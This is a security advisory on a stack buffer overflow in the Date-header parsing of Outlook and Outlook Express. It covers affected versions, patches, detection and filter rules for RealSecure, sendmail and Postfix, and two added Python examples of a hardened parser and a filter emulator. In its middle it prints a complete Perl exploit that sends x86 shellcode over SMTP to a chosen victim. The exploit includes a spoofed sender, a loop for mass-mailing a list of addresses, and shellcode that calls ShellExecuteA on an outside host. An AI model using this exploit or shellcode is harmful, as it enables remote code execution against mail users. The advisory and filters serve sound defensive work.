COMMAND
Outlook
SYSTEMS AFFECTED
Outlook Express 4.0, 4.01, 5.0, 5.01, Outlook 97, 98, 2000
PROBLEM
Ussr Labs and Aaron Drew both found the same issue. A bug in a
shared component of Microsoft Outlook and Outlook Express mail
clients can allow a remote user to write arbitrary data to the
stack. This bug has been found to exist in all versions of MS
Outlook and Outlook Express on both Windows 95/98 and Windows NT
4.
The vulnerability lies in the parsing of the GMT (time zone) section
of the Date field in the header of an email. Bounds checking on the
token representing the GMT offset is not properly handled. This bug can be
witnessed by opening an email with an exceptionally long string
directly preceding the GMT specification in the Date header field
such as:
Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
The bug lies in the shared library INETCOMM.DLL and has been
successfully exploited on Windows 95, 98 and NT with both Outlook
and Outlook Express.
The execution of this code is performed differently under each
client. Under Outlook Express, the buffer overflow occurs as
soon as the user tries to view the mail folder containing email
with a malicious date header. Under Microsoft Outlook, the
overflow occurs when attempting to preview, read, reply or
forward any email with a malicious date header. Under MS Outlook
a user may delete or save an email to disk without exploitation.
Whilst some mail transport systems seem to modify 8-bit header
data or lines over 70 characters in length, preventing direct
exploitation, these restrictions seem to be avoided by encoding a
message with an exploit Date field as a MIME attachment in
Outlook's attached-message format. These messages also
overflow the stack when read, previewed, replied to or forwarded.
A nice little feature of this buffer overflow is that the mail
is not deleted from the server, so the next time Outlook is loaded
it will try to download the mail again, causing it to crash again.
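To show what the missing check looks like when it is present, here is an added example of a hardened RFC 822 Date-header parser. It is not code from INETCOMM.DLL or from USSR Labs; every name in it is hypothetical. The zone token is length-checked before it is used for anything, the whole header value is capped at the same 60 characters the MTA filters later on this page use, and the parser is run over constructed samples modelled on the two malformed headers quoted above.

```python
import re
from datetime import datetime, timedelta, timezone

# Added example: a hardened RFC 822 Date-header parser written for this page,
# not code from INETCOMM.DLL or from USSR Labs. All names are hypothetical.

MAX_HEADER_LEN = 60   # same limit the sendmail/Postfix rules on this page use
MAX_ZONE_LEN = 5      # "+1000" / "-0500" is the longest legal zone token

# Zone token grammar: signed four-digit offset or one of the RFC 822 names.
ZONE_RE = re.compile(r"^(?:[+-]\d{4}|UT|GMT|[ECMP][SD]T)$")
NAMED_ZONE_HOURS = {"UT": 0, "GMT": 0, "EST": -5, "EDT": -4, "CST": -6,
                    "CDT": -5, "MST": -7, "MDT": -6, "PST": -8, "PDT": -7}


class DateHeaderError(ValueError):
    """Raised for any Date: value we refuse to interpret."""


def parse_zone(token):
    """Turn a bounded zone token into a tzinfo; reject anything else.

    The length check runs before the token is used for anything, which is
    the check the vulnerable parser lacked.
    """
    if len(token) > MAX_ZONE_LEN:
        raise DateHeaderError("zone token too long (%d bytes)" % len(token))
    if not ZONE_RE.match(token):
        raise DateHeaderError("malformed zone token %r" % token)
    if token[0] in "+-":
        sign = 1 if token[0] == "+" else -1
        offset = timedelta(hours=int(token[1:3]), minutes=int(token[3:5]))
        return timezone(sign * offset)
    return timezone(timedelta(hours=NAMED_ZONE_HOURS[token]))


def parse_date_header(value):
    """Parse the text after 'Date:' into an aware datetime, or raise."""
    if len(value) > MAX_HEADER_LEN:
        raise DateHeaderError("Date header too long (%d bytes)" % len(value))
    # Drop an optional day-of-week prefix; tolerate "Thu,13" without a space.
    value = re.sub(r"^\s*[A-Za-z]{3},\s*", "", value.strip())
    tokens = value.split()
    if len(tokens) != 5:
        raise DateHeaderError("expected 'dd Mon yyyy hh:mm:ss zone', got %r" % value)
    day, month, year, clock, zone = tokens
    tz = parse_zone(zone)                     # validate the zone before the rest
    naive = datetime.strptime("%s %s %s %s" % (day, month, year, clock),
                              "%d %b %Y %H:%M:%S")
    return naive.replace(tzinfo=tz)


def classify(value):
    """Return 'ok' or 'reject: <reason>' for a Date: value."""
    try:
        parse_date_header(value)
        return "ok"
    except ValueError as exc:          # DateHeaderError and strptime errors
        return "reject: %s" % exc


# Constructed samples modelled on the two headers quoted in the advisory.
SAMPLES = {
    "normal":    "Fri, 13 Jul 2000 14:16:06 +1000",
    "advisory":  "Fri, 13 July 2000 14:16:06 +1000" + "x" * 80,
    "smtp_test": "Thu,13 Jun 2000 12:33:16 +" + "1" * 61,
    "short_bad": "Thu, 13 Jun 2000 12:33:16 +1000xxxx",  # under 60 bytes, zone still bad
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print("%-10s %s" % (name, classify(value)))
```

The order of the checks matters: the zone token is validated before the date itself is interpreted, so a header that is short enough to pass the overall length cap ("short_bad" above) is still refused on the zone token alone.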
To test this vulnerability USSR telneted to an SMTP server and
sent the following to themselves:
HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16 +1111111111111111111111111111111111111111111111111111111111111
(dot here)
QUIT
After the remote host closed the connection and sent mail to the
appropriate address, upon receipt of the mail the following fault
was generated by Outlook:
OUTLOOK caused an invalid page fault in
module <unknown> at 00de:00aedc5a.
Registers:
EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
Bytes at CS:EIP:
Stack dump:
0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054
0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131
The following code will create and send an e-mail message that, when
downloaded by Outlook, will open http://www.ussrback.com.
Unix/Linux Perl Version:
http://www.ussrback.com/outoutlook.pl
Windows Console Version:
http://www.ussrback.com/outoutlook.exe
Windows Console Version Source:
http://www.ussrback.com/outoutlook.zip
Below you will find the Perl version and the MIME-encoded source of
the Windows console version. Perl code:
#!/usr/bin/perl
#******************************************************************************
#http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow)
# Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98
#******************************************************************************
#
# By: Ussr Labs
#
# Arbitrary shellcode injector over SMTP
# ./$0 -h <server hostname> -m <mail>
# ./dieoutlook.pl -h <smtp server> -m victim@address.com
#
#
#
# For multiple e-mails, spawn something like this:
#
# for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done
#
#
#
#
use Getopt::Std;
use Socket;
getopt('h:m', \%args);
# user defined variables
if(defined($args{h})){$serv=$args{h}}else{&usage;}
if(defined($args{m})){$rcpt=$args{m}}else{&usage;}
# These are the escape characters which will cause the seg violation.
# *nix didn't like the ascii interpretation, so we send the
# characters in hex.
# +,1 ,Ì ,^ ,Ð ,z , ,x
$spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" .
"\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a";
$shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" .
"\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" .
"\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" .
"\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" .
"\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" .
"\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" .
"\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" .
"\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" .
"\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" .
"\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" .
"\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" .
"\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" .
"\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" .
"\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" .
"\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" .
"\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" .
"\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" .
"\x6B\x2E\x63\x6F\x6D\x00";
$ret = "00aedc5a"; # return address
$nop = "\x90"; # x86 NOP
$port = 25; # default 25 SMTP port
$buffsize = "1348"; # buffer size
$buffer .= $nop x 945; # load $buffer with 945 NOP then $shellcode
$buffer .= $shellcode; # append shellcode to buffer
$offset = (hex $ret); # return hex string to corresponding value
$code = pack("N", $offset); # big-endian (long) network order
while (length $buffer < $buffsize) { $buffer .= $code; }
$buffer .= "\n\n";
print "$code\n";
# create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ]
$max=(int rand 15);
@a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] }
@a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] }
@dom = ('.com', '.net', '.org');
$rdom = $dom[ rand @dom ];
$rmail = $str . "@" . $host . $dom;
print "random address set to: $rmail\n";
# random date method, format: Date: <day>, <int-day> <month> 2000 <time>
@days = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun');
$rday = $days[ rand @days ];
$rcal=(int rand(31));
$rhour=(int rand(23)); if ($rhour < 10){ $rhour = "0".$rhour; }
$rmin=(int rand(59)); if ($rmin < 10){ $rmin = "0".$rmin; }
$rsec=(int rand(59)); if ($rsec < 10){ $rsec = "0".$rsec; }
@months = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Oct', 'Sep', 'Nov', 'Dec');
$rmonth = $months[ rand @months ];
$date = "Date: ".$rday.","; if ( $rcal >9 ){$date = $date."$rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
else { $date = $date." $rcal"." $rmonth"." 2000 ".$rhour.":".$rmin.":".$rsec," ";}
print "date set to: $date\n";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(S, $paddr) || die("Error: $!\n");
select(S); $| = 1; select(STDOUT);
# begin our SMTP transaction
print "now starting SMTP transaction\n";
$res=<S>; print "$res\n";
print "sending HELO\n";
system("sleep 2s");
print S "HELO\r\n";
$res=<S>; print "$res\n";
print "sending MAIL FROM\n";
system("sleep 2s");
print S "MAIL FROM:$rmail\r\n";
$res=<S>; print "$res\n";
print "sending RCPT\n";
system("sleep 2s");
print S "RCPT TO:$rcpt\r\n";
$res=<S>; print "$res\n";
print "sending DATA\n";
system("sleep 2s");
print S "DATA\r\n";
$res=<S>; print "$res\n";
print "sending escape characters\n";
print S "$date";
print S " $spawn";
print "sending shellcode\n";
print S "$shellcode\r\n\r\n\r\n";
#$res=<S>; print "$res\n";
print S ".\r\n";
print S "QUIT\r\n";
print "shellcode spawn was successful\n";
close(S);
sub usage {die("\n\n./$0 -h <hostname> -m <mail>\n\n");}
Mimed source:
---
Content-Type: application/octet-stream; name="outoutlk.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="outoutlk.zip"
Content-MD5: RKXrs6kVv/BYUtduvsKVlA==
---
Even the PGP plugin for MSIE (and what else?) is vulnerable.
Trying to build a secure system using insecure components (e.g.
Windows).
SOLUTION
This vulnerability can be eliminated by taking any of the
following actions:
- Installing the patch available at
http://www.microsoft.com/windows/ie/download/critical/patch9.htm
- Performing a default installation of Internet Explorer 5.01 Service Pack 1,
http://www.microsoft.com/Windows/ie/download/ie501sp1.htm.
- Performing a default installation of Internet Explorer 5.5 on
any system except Windows 2000.
The patch requires IE 4.01 SP2 or IE 5.01 to install. Customers
who install this patch on versions other than these may receive a
message reading "This update does not need to be installed on this
system". This message is incorrect. More information is available
in KB article Q267884.
Detection of this new threat with conventional tools is very
difficult. To make detection and filtering even more difficult,
some conventional methods of preventing such attacks can easily be
circumvented.
Internet Security Systems RealSecure customers can use the
following procedure to detect and/or kill malicious email
traveling over SMTP:
1. From the View menu, select 'Network Sensor Policies' or
'Network Engine Policies', depending on the version of
RealSecure you are using.
2. Select your policy, and then click 'Customize...'.
3. Click the 'User Defined Events' tab.
4. Click 'Add' on the right hand side of the dialog box.
5. Type in a name for the event, such as 'Outlook Date
Overflow'.
6. In the 'Context' field, select 'Email_Content'.
7. In the 'String' field, type the following:
^Date: (.{50,50}|.*[^ -~]+)
8. You may want to configure RealSecure to kill the connection
by editing the 'Response' field to include the RSKILL
action.
9. Click 'Save', and then click 'Close'.
10. Click 'Apply to Sensor' or 'Apply to Engine', depending on
the version of RealSecure you are using.
RealSecure will now detect messages with a Date: field that is
longer than 50 characters, or if it contains any non-printable
characters (not between ASCII 0x20 and 0x7E, space, or tilde). It
is possible for this signature to false positive if there is a
line in your e-mail that starts with "date: ", and at least 50
characters or any non-printable characters or extended ASCII
characters on the same line after it. If you have a high false
positive rate, increase both numbers in the regular expression
from 50 to 70.
Here is the Sendmail filter rule to stop the Outlook exploit. It is
also available, with tabs in the right places, at
http://www.cetis.hvu.nl/~koos/outlookoverflow.txt:
#
# this is a filter to make sendmail reject messages with Date: headers
# that are too long. This is used in the latest Outlook exploit.
#
# You NEED:
# - a sendmail that understands regex maps. I had to specially compile this
# into 8.11 ! Add to sendmail-8.11.0/devtools/Site/site.config.m4
# define(`confMAPDEF',`-DMAP_REGEX') and rebuild from scratch
#
# The filter simply rejects messages with a date header longer (total!)
# then 60 chars
#
# Then add this part to your .mc file in the different areas and regenerate
# your .cf file
#
# 2000-07-21 Originally written
#
# if you cut and paste this:
# tabs are in use in the '^R' lines
#
# Koos van den Hout
# http://www.cetis.hvu.nl/~koos/
# http://www.virtualbookcase.com/
#
LOCAL_CONFIG
Klinetoolong regex -a@MATCH ^.{60,}$
LOCAL_RULESETS
HDate: $>+CheckDate
SCheckDate
R$*	$: $(linetoolong $1 $)
R@MATCH	$#error $: 553 Date Header too long error
R$*	$@ OK
With a little help from Koos van den Hout, Mark Lastdrager made a
small header_check for Postfix to prevent people from exploiting
the latest Outlook bug. A quick test shows it works, but don't
come complaining when it doesn't. In your main.cf put this line:
header_checks = regexp:/etc/postfix/header_checks
(path depends on where your postfix config lives). In
header_checks put:
/^Date:.{60,}$/ REJECT
This will reject messages with a Date line longer than 60 characters.
Don't forget to run postfix reload afterwards.
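The three filters above (the RealSecure content signature, the sendmail regex map and the Postfix header_checks rule) are scoped differently and do not catch exactly the same messages. The following added example, which is not code from RealSecure, sendmail or Postfix, applies the three regular expressions quoted in this advisory to constructed messages so those differences, including the false positive the RealSecure note warns about and the effect of raising its number from 50 to 70, are visible. How each rule is scoped (every line of the message, header lines only, or the Date value only) is my reading of each tool's context rather than vendor text.

```python
import re

# Added example: emulates the three filters quoted in this advisory against
# constructed messages. Not RealSecure, sendmail or Postfix code; only the
# regular expressions come from the page. The scoping of each rule is an
# assumption about how that tool applies it.

def realsecure_re(min_len=50):
    """The RealSecure 'Email_Content' string; 50 is the advisory's default,
    70 the value it suggests when false positives are high."""
    return re.compile(r"^Date: (.{%d,%d}|.*[^ -~]+)" % (min_len, min_len),
                      re.IGNORECASE)

POSTFIX_RE = re.compile(r"^Date:.{60,}$")   # header_checks rule, header lines only
SENDMAIL_RE = re.compile(r"^.{60,}$")       # regex map applied to the Date value


def split_message(raw):
    """Split a CRLF-terminated RFC 822 message into header and body lines."""
    headers, body = raw.split("\r\n\r\n", 1)
    return headers.split("\r\n"), body.split("\r\n")


def realsecure_hits(raw, min_len=50):
    """Lines anywhere in the message (content context) the signature matches."""
    pattern = realsecure_re(min_len)
    headers, body = split_message(raw)
    return [line for line in headers + body if pattern.search(line)]


def postfix_verdict(raw):
    """Emulate header_checks: REJECT if any header line matches."""
    headers, _ = split_message(raw)
    return "REJECT" if any(POSTFIX_RE.search(h) for h in headers) else "OK"


def sendmail_verdict(raw):
    """Emulate the CheckDate ruleset: the map sees only the header's value."""
    headers, _ = split_message(raw)
    for h in headers:
        if h.lower().startswith("date:"):
            if SENDMAIL_RE.search(h[5:].strip()):
                return "553 Date Header too long error"
    return "OK"


# Constructed messages (not real captures).
HEAD = "From: sender@example.invalid\r\nTo: user@example.invalid\r\n"
NORMAL = HEAD + "Date: Fri, 13 Jul 2000 14:16:06 +1000\r\n\r\nhello\r\n"
# Modelled on the header the advisory sent by hand over SMTP.
MALICIOUS = HEAD + "Date: Thu,13 Jun 2000 12:33:16 +" + "1" * 61 + "\r\n\r\nhello\r\n"
# The false positive the advisory warns about: a long body line starting "date: ".
FALSE_POSITIVE_LINE = "date: the room booking was moved to the larger hall, see the attached plan"
FALSE_POSITIVE = NORMAL + FALSE_POSITIVE_LINE + "\r\n"
# A short Date header carrying an 8-bit byte: only the non-printable branch fires.
EIGHT_BIT = HEAD + "Date: Fri, 13 Jul 2000 14:16:06 +1000\u00dc\r\n\r\nhello\r\n"


if __name__ == "__main__":
    for name, msg in (("normal", NORMAL), ("malicious", MALICIOUS),
                      ("false-positive", FALSE_POSITIVE), ("8-bit", EIGHT_BIT)):
        print("%-15s RealSecure=%d Postfix=%s sendmail=%s" % (
            name, len(realsecure_hits(msg)), postfix_verdict(msg),
            sendmail_verdict(msg)))
```

Running it shows the trade-off: the MTA rules never fire on body text, so the "date: ..." body line is only a problem for the content-context signature, while the length-only MTA rules say nothing about a short Date header that carries 8-bit bytes. Raising the RealSecure number to 70, as the advisory suggests, drops the body-line false positive but still matches the 87-character malicious header.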